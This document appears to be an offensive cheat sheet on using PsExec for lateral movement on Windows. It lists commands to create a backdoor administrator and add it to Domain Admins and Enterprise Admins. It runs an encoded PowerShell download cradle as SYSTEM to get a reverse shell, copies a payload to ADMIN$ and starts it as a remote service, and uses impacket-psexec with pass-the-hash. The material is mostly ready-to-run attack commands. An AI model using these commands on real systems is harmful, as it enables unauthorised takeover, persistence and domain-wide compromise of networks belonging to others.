

PsExec is a light-weight telnet-replacement that lets you execute processes on other Windows systems, complete with full interactivity for console applications, without having to manually install client software.


The target must be a Windows based operating system, and the C$ or ADMIN$ share (or equivalent share into C:\Windows\System32) must be writable. If a network share is not available, see MOF Upload, an alternative to PsExec.


To set up, either obtain and utilize Administrator credentials to the share(s) in question, or make them writable by modifying user permissions in the Sharing tab on windows. To create a user that can access C$ or ADMIN$, use the following command as Administrator:

net user kevin.beacon securepassword /add
net localgroup Administrators kevin.beacon /add

If within an active directory environment, you may add the user to either "Domain Admins" for the current tree in the forest, or "Enterprise Admins" for the entire forest.

net group "Domain Admins" kevin.beacon /add /domain
net group "Enterprise Admins" kevin.beacon /add /domain


Method 1 - Sysinternals

From a Windows client, the Sysinternals suite can be used to execute arbitrary programs on the target machine. Use -s to run the command as NT AUTHORITY\SYSTEM, and use -i to make it interactive, though this will almost certainly break in a reverse shell. Though, using this flag also gives some useful output even when spawning a reverse shell through PsExec, which is why it is listed below.

.\psexec.exe -accepteula -u user -p password -s -i \\ cmd /c %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -enc <base64 encoded cradle>

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Method 2 - Manually PsExecing with SC

From a Windows client, upload the binary you wish to execute on the target and start a remote service with the following commands (there is supposed to be a space after binPath):

copy payload.exe \\\ADMIN$
sc \\ create servicename binPath= "C:\Windows\payload.exe"
sc \\ start servicename

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Method 3 - Impacket-PsExec

The impacket library was created in python, so as long as python and impacket are installed, this should work from any OS that supports python.

impacket-psexec DOMAIN/USERNAME:'PASSWORD'@target

If you do not have or know the password, but you do have the NTLM hash, then impacket also supports Pass The Hash (Only place the part of the hash after the colon in this command):

impacket-psexec -hashes :NTHASH DOMAIN/USERNAME@target

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